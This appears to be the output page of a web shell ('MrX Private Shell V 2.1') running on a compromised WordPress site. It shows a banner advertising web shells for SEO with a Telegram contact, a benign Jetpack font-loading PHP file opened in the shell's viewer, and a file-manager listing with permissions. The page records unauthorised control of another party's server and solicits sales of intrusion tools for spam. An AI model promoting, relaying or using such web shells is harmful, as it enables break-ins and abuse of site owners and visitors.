__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
/**
* Load the google fonts based on the current WordPress version.
*
* @package automattic/jetpack
*/
add_action(
'plugins_loaded',
function () {
if ( class_exists( 'WP_Font_Face' ) ) {
// WordPress 6.5 or above with the new Font Library.
require_once __DIR__ . '/current/load-google-fonts.php';
} elseif ( class_exists( 'WP_Fonts' ) || class_exists( 'WP_Webfonts' ) ) {
// Gutenberg Fonts API compatible.
require_once __DIR__ . '/wordpress-6.3/load-google-fonts.php';
}
},
// Ensure the action is loaded after the late_initialization.
// See projects/plugins/jetpack/class.jetpack.php.
999
);
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| current | Folder | 0755 |
|
|
| wordpress-6.3 | Folder | 0755 |
|
|
| load.php | File | 630 B | 0644 |
|